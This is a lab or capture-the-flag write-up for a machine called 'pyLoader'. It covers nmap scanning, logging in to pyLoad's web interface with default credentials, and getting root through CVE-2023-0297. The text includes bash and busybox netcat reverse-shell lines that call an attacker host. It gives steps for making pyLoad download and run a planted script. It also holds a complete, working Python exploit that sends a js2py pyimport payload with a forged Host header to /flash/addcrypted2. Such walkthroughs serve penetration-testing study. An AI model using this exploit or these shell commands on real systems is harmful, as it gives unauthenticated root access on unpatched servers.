pyLoader

Enum

sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v --top-ports 100 -oN udp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP

UDP is limited to the top ports: a full-range UDP version scan takes hours and rarely pays off on a box like this. The slow full-TCP pass is there to catch anything the rate-limited scan dropped.

Services:

ssh 22
pyload 9666

Default creds on pyLoad worked (web UI on 9666):

pyload:pyload

Found these (both against the running pyLoad-ng version):

- GitHub advisory: "Download to arbitrary folder can lead to RCE" (drop a package into the scripts directory so pyLoad executes it on an event)
- Packet Storm: "PyLoad 0.5.0 Remote Code Execution"

Trying the first one

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh
sudo python3 -m http.server 80
nc -lvnp 9999

On pyLoad

Change pyLoad's file permission settings so the downloaded script is executable:

Change permissions of downloads: On
Permission mode for downloaded files: 0744

Create a package with link pointing to the attacker

http://<attacker_ip>/evil.sh

Edit the package and change its folder to /config/scripts/package_deleted/ (scripts in that directory run when a package is deleted)

Refresh the package. Wait up to 60 seconds for the scripts directory to be rescanned by pyLoad

Delete any package to trigger the script

This did not work (no callback on 9999), so back to the other RCE.

GitHub - JacobEbben/CVE-2023-0297: Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31
https://github.com/JacobEbben/CVE-2023-0297

Confirmed valid (the check command executed). Now get a shell: start a listener on 4444 first (nc -lvnp 4444), then:

python3 exploit.py -t http://192.168.245.26:9666 -c 'busybox nc 192.168.45.171 4444 -e sh'
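What the exploit actually sends, as an added example (my code, not the JacobEbben script or pyLoad's own): pyLoad's Click'N'Load handler at /flash/addcrypted2 evaluates the attacker-supplied jk form field with js2py to recover a decryption key, and js2py exposes pyimport, so the field can import os and run a command before the key is ever used. The endpoint is guarded by a "local only" check that also accepts requests whose Host header is 127.0.0.1:9666, which is why the request sets that header. Function names, the placeholder target, and the dummy package/crypted/passwords values are my assumptions.

```python
"""Added example (not from the original writeup): build and send the
CVE-2023-0297 request against pyLoad-ng's /flash/addcrypted2 endpoint."""
import urllib.error
import urllib.parse
import urllib.request


def build_jk(command: str) -> str:
    """JavaScript for the jk field. js2py's `pyimport` pulls in Python's os
    module; os.system() runs the command; f() is then defined so the handler's
    own trailing `f()` call does not throw before os.system has run."""
    escaped = command.replace("\\", "\\\\").replace('"', '\\"')
    return f'pyimport os;os.system("{escaped}");f=function f2(){{}};'


def build_form(command: str) -> bytes:
    """URL-encoded POST body. package, crypted and passwords only need to be
    present; their values are never reached because jk is evaluated first."""
    fields = {
        "package": "pwn",        # assumed dummy value
        "crypted": "AAAA",       # assumed dummy value
        "jk": build_jk(command),
        "passwords": "aaaa",     # assumed dummy value
    }
    return urllib.parse.urlencode(fields).encode()


def send_payload(base_url: str, command: str, timeout: float = 10.0) -> int:
    """POST the payload. Returns the HTTP status. A 500 ("Could not decrypt
    key") is the normal result: f() returns undefined, so key parsing fails,
    but by then os.system() has already executed server-side."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/flash/addcrypted2",
        data=build_form(command),
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            # satisfies the handler's local-only check, which also trusts this Host value
            "Host": "127.0.0.1:9666",
        },
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


if __name__ == "__main__":
    import sys
    # usage: python3 cnl_rce.py http://<target>:9666 'busybox nc <lhost> 4444 -e sh'
    print(send_payload(sys.argv[1], sys.argv[2]))
```

On a patched build (0.5.0b3.dev31 and later) the same request fails because pyLoad disables js2py's pyimport before evaluating jk, so a quick way to confirm the version is vulnerable is a harmless command such as a touch in /tmp followed by checking for the 500 response and the file.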

Instant root: pyLoad runs as root, so the callback shell is already uid 0 and no privilege escalation is needed.

proof.txt

b873d3335d7831c4e91fb12e6a9196eb